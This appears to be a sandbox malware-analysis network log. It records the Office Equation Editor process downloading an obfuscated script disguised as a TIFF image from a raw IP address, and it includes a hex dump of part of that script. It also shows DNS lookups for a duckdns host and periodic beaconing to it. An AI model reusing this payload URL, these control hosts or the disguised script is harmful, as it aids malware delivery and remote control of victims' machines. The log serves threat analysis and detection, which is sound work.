                                                                                                                          Oct 5, 2024 14:58:29.409440041 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409454107 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409473896 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409506083 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409539938 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409571886 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409579992 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409579992 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409606934 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409640074 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409673929 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409708023 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409713984 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409713984 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409740925 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409778118 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409811020 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409867048 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409867048 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.410119057 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410156012 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410191059 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410226107 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410229921 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.410260916 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410274982 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.410294056 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410326004 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410356045 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.410358906 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410393000 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410425901 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410459042 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410465002 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.410465002 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.410492897 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410526037 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.410550117 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.413449049 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.415333033 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.426433086 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426502943 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426539898 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426573992 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426609039 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426661968 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426700115 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426732063 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426767111 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426800013 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426837921 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426851034 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.426851034 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.426851034 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.426871061 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426884890 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.426906109 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426939011 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.426973104 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.427011967 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.427011967 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.427017927 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.448828936 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.448879004 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.448916912 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.448972940 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449007034 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449039936 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449062109 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.449062109 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.449075937 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449109077 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449136972 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.449142933 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449176073 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449208975 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449232101 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.449242115 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449280024 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449309111 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.449322939 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.449322939 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.450058937 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.450125933 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.493484974 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493527889 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493592978 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493628979 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493663073 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493699074 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493752003 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493752003 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.493752956 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.493792057 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.493803978 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493837118 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493871927 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493906021 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493940115 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.493969917 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494003057 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494033098 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494033098 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494033098 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494036913 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494066000 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494069099 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494122028 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494157076 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494191885 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494224072 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494247913 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494247913 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494247913 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494256973 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494290113 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494323015 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494355917 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494390011 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494424105 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.494472980 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494472980 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.494472980 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.496520996 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.812448025 CEST8049172178.237.33.50192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.812526941 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:58:34.826347113 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.964210033 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.964306116 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.964381933 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.964557886 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.969603062 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.969645023 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.969676018 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.969705105 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.969726086 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.969726086 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.969772100 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.975275993 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975318909 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975347996 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975377083 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975387096 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.975467920 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975497007 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975524902 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975552082 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.975917101 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:34.980734110 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.980772972 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.980804920 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.981635094 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:34.981705904 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:56.418386936 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:56.420103073 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:56.425128937 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:59:26.659956932 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:59:26.661859035 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:59:26.867146015 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:59:26.867306948 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:59:26.868099928 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:59:36.959500074 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:59:37.266573906 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:59:37.873594999 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:59:39.075284004 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:59:41.477271080 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:59:46.281981945 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:59:55.892558098 CEST4917280192.168.2.22178.237.33.50
                                                                                                                          Oct 5, 2024 14:59:56.507658005 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:59:56.521830082 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:59:56.527293921 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:00:26.551312923 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:00:26.552620888 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 15:00:26.558115959 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:00:56.817397118 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:00:56.819120884 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 15:00:56.824228048 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:01:26.640453100 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:01:26.648682117 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 15:01:26.654721975 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:01:56.673106909 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 15:01:56.674468994 CEST491681991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 15:01:56.679440022 CEST19914916884.32.44.139192.168.2.22
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 5, 2024 14:58:20.862488985 CEST5456253192.168.2.228.8.8.8
                                                                                                                          Oct 5, 2024 14:58:20.869488001 CEST53545628.8.8.8192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:25.619313002 CEST5291753192.168.2.228.8.8.8
                                                                                                                          Oct 5, 2024 14:58:26.628633976 CEST5291753192.168.2.228.8.8.8
                                                                                                                          Oct 5, 2024 14:58:26.725548029 CEST53529178.8.8.8192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.172595024 CEST6275153192.168.2.228.8.8.8
                                                                                                                          Oct 5, 2024 14:58:28.181930065 CEST53627518.8.8.8192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:30.626852989 CEST53529178.8.8.8192.168.2.22
                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                          Oct 5, 2024 14:58:30.628896952 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Oct 5, 2024 14:58:20.862488985 CEST192.168.2.228.8.8.80x296fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:25.619313002 CEST192.168.2.228.8.8.80xa4a2Standard query (0)cavps7.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:26.628633976 CEST192.168.2.228.8.8.80xa4a2Standard query (0)cavps7.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:28.172595024 CEST192.168.2.228.8.8.80xe73fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Oct 5, 2024 14:58:20.869488001 CEST8.8.8.8192.168.2.220x296fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:20.869488001 CEST8.8.8.8192.168.2.220x296fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:20.869488001 CEST8.8.8.8192.168.2.220x296fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:20.869488001 CEST8.8.8.8192.168.2.220x296fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:26.725548029 CEST8.8.8.8192.168.2.220xa4a2No error (0)cavps7.duckdns.org84.32.44.139A (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:28.181930065 CEST8.8.8.8192.168.2.220xe73fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                          Oct 5, 2024 14:58:30.626852989 CEST8.8.8.8192.168.2.220xa4a2Server failure (2)cavps7.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                          • raw.githubusercontent.com
                                                                                                                          • 51.83.251.113
                                                                                                                          • geoplugin.net
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.224916551.83.251.113803288C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 5, 2024 14:58:15.052689075 CEST339OUTGET /650/picturewithgetmebackgreatdayfor.tIF HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                          Host: 51.83.251.113
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Oct 5, 2024 14:58:15.704265118 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 05 Oct 2024 12:58:15 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Thu, 03 Oct 2024 04:28:28 GMT
                                                                                                                          ETag: "3ed96-6238afc7a9d9b"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 257430
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: image/tiff
                                                                                                                          Data Raw: ff fe 41 00 4e 00 76 00 4b 00 57 00 74 00 57 00 57 00 66 00 5a 00 54 00 47 00 63 00 7a 00 68 00 57 00 66 00 41 00 57 00 6b 00 4b 00 78 00 63 00 6c 00 73 00 4c 00 20 00 3d 00 20 00 22 00 4f 00 6b 00 69 00 57 00 57 00 66 00 43 00 66 00 64 00 78 00 4c 00 7a 00 42 00 65 00 63 00 66 00 47 00 6b 00 66 00 57 00 6c 00 61 00 41 00 47 00 5a 00 78 00 22 00 0d 00 0a 00 65 00 57 00 4c 00 52 00 57 00 4c 00 57 00 75 00 57 00 47 00 55 00 4a 00 57 00 49 00 66 00 4c 00 66 00 55 00 4f 00 50 00 6c 00 4b 00 57 00 6a 00 4b 00 78 00 20 00 3d 00 20 00 22 00 4f 00 6b 00 6f 00 78 00 42 00 68 00 4b 00 47 00 7a 00 42 00 57 00 72 00 57 00 70 00 4b 00 50 00 50 00 43 00 61 00 4c 00 4c 00 74 00 4c 00 43 00 4c 00 4c 00 22 00 0d 00 0a 00 78 00 4c 00 65 00 4c 00 70 00 52 00 75 00 69 00 55 00 4c 00 4c 00 69 00 6d 00 57 00 71 00 63 00 6e 00 55 00 7a 00 4e 00 55 00 73 00 41 00 62 00 6b 00 4c 00 20 00 3d 00 20 00 22 00 68 00 57 00 4f 00 57 00 53 00 50 00 55 00 63 00 70 00 75 00 55 00 4c 00 61 00 50 00 62 00 49 00 55 00 66 00 66 00 6b 00 [TRUNCATED]
                                                                                                                          Data Ascii: ANvKWtWWfZTGczhWfAWkKxclsL = "OkiWWfCfdxLzBecfGkfWlaAGZx"eWLRWLWuWGUJWIfLfUOPlKWjKx = "OkoxBhKGzBWrWpKPPCaLLtLCLL"xLeLpRuiULLimWqcnUzNUsAbkL = "hWOWSPUcpuULaPbIUffkPZtmkZ"LiasOWANWviperinakKLLlNedioLjibK = "GikGBdOBmeWhikzeKWkoRflncO"LLZqiHhqthvCULmAcezBBPmcGp = "GhWeojKbieANomrtlhKGWWLbPB"dCCWUGRzUeWLGGhbCGQUZcLaui = "evWKjIkLOGLziSgAzTuKChpicW"LBUWkkGcZLAgpWrLpbZPZLKiUo = "sniQiozNnOGNrnQzhuLLOpGocS"iUZhlkzikTtmmKclbURtGLicKz = "pKaiikGLKiW
                                                                                                                          Oct 5, 2024 14:58:15.704313993 CEST224INData Raw: 00 72 00 5a 00 63 00 6f 00 65 00 42 00 63 00 57 00 6f 00 52 00 76 00 69 00 4b 00 52 00 6b 00 22 00 0d 00 0a 00 57 00 4f 00 6d 00 78 00 41 00 71 00 43 00 62 00 43 00 75 00 4c 00 4c 00 48 00 6e 00 7a 00 41 00 52 00 4e 00 70 00 4c 00 57 00 62 00 6f
                                                                                                                          Data Ascii: rZcoeBcWoRviKRk"WOmxAqCbCuLLHnzARNpLWbocTL = "oiWiiIaLGmpppLGkCmmbkWxCBA"eSAiuabecWLRAciihbUajUKmxz = "JAfZA
                                                                                                                          Oct 5, 2024 14:58:15.704353094 CEST1236INData Raw: 00 4c 00 6e 00 63 00 53 00 6f 00 41 00 70 00 6d 00 6f 00 57 00 43 00 57 00 4b 00 4c 00 53 00 64 00 41 00 4e 00 49 00 4c 00 74 00 22 00 0d 00 0a 00 0d 00 0a 00 72 00 5a 00 65 00 47 00 47 00 57 00 74 00 50 00 78 00 7a 00 61 00 74 00 69 00 65 00 4b
                                                                                                                          Data Ascii: LncSoApmoWCWKLSdANILt"rZeGGWtPxzatieKKWimuLkWiBt = "keUbLLcsRgBnALceiuhcfKBLBG"NkWdLSWiKLvLPWCRBUiOhLNZiz = "tkZWAt
                                                                                                                          Oct 5, 2024 14:58:15.704387903 CEST1236INData Raw: 00 62 00 22 00 0d 00 0a 00 0d 00 0a 00 70 00 66 00 61 00 61 00 41 00 4b 00 73 00 57 00 65 00 70 00 69 00 5a 00 4f 00 71 00 69 00 55 00 65 00 47 00 5a 00 62 00 75 00 42 00 50 00 5a 00 71 00 65 00 20 00 3d 00 20 00 22 00 42 00 4b 00 68 00 62 00 72
                                                                                                                          Data Ascii: b"pfaaAKsWepiZOqiUeGZbuBPZqe = "BKhbrAzAocfqWcZntWGbGOTxbG"GzULLkizJhRZzWJsPUidBzHqhA = "afhqKiiRoKWtmnfjLcJxCAiJNK
                                                                                                                          Oct 5, 2024 14:58:15.704421997 CEST1236INData Raw: 00 68 00 6d 00 64 00 6a 00 4e 00 55 00 20 00 3d 00 20 00 22 00 69 00 4c 00 7a 00 6c 00 57 00 4e 00 78 00 62 00 6d 00 57 00 7a 00 47 00 75 00 75 00 50 00 51 00 68 00 4b 00 6a 00 4a 00 67 00 4c 00 55 00 78 00 6b 00 6b 00 22 00 0d 00 0a 00 57 00 76
                                                                                                                          Data Ascii: hmdjNU = "iLzlWNxbmWzGuuPQhKjJgLUxkk"WvzLLWWWPLWmkKlzeWWbLedIZv = "KNULgLkjWPrppAZGUxQlGzheoc"bOoGLkWbbZoUfabiWOjilKb
                                                                                                                          Oct 5, 2024 14:58:15.704452991 CEST1236INData Raw: 00 6f 00 66 00 55 00 4b 00 67 00 65 00 55 00 57 00 7a 00 6d 00 22 00 0d 00 0a 00 66 00 42 00 70 00 4c 00 6d 00 57 00 70 00 4b 00 65 00 57 00 61 00 47 00 78 00 70 00 4c 00 6b 00 69 00 47 00 69 00 4b 00 4e 00 6d 00 70 00 55 00 50 00 64 00 20 00 3d
                                                                                                                          Data Ascii: ofUKgeUWzm"fBpLmWpKeWaGxpLkiGiKNmpUPd = "GJLceoLebCWraoHukzWZehccmU"AoGPWLxWKKLkGOIeSzKcGGeLWG = "jKOKkpqhcLhLthUWgxm
                                                                                                                          Oct 5, 2024 14:58:15.704488039 CEST1236INData Raw: 00 74 00 43 00 4c 00 6f 00 71 00 63 00 63 00 6e 00 62 00 51 00 53 00 63 00 50 00 69 00 6e 00 5a 00 50 00 20 00 3d 00 20 00 22 00 78 00 6b 00 52 00 4b 00 69 00 69 00 6c 00 57 00 4c 00 70 00 74 00 66 00 41 00 78 00 62 00 57 00 6f 00 7a 00 47 00 69
                                                                                                                          Data Ascii: tCLoqccnbQScPinZP = "xkRKiilWLptfAxbWozGieWicfi"qNdLWQiKLutcfepLigfLWondUA = "KCCediCviperinacLuHzlLmNvNqbBNAl"oziihG
                                                                                                                          Oct 5, 2024 14:58:15.704519987 CEST1120INData Raw: 00 57 00 69 00 66 00 4c 00 74 00 43 00 57 00 55 00 61 00 20 00 3d 00 20 00 22 00 6b 00 61 00 6f 00 50 00 5a 00 4e 00 52 00 6e 00 6f 00 68 00 5a 00 74 00 6f 00 54 00 5a 00 42 00 63 00 57 00 55 00 63 00 4c 00 69 00 61 00 54 00 6d 00 5a 00 22 00 0d
                                                                                                                          Data Ascii: WifLtCWUa = "kaoPZNRnohZtoTZBcWUcLiaTmZ"UiioBHLdtGNWkqhiLWfKKWLmPL = "RNZfoLieOgALofKWOKnPUWOWRN"PvmGffILeULbKLSaWiGd
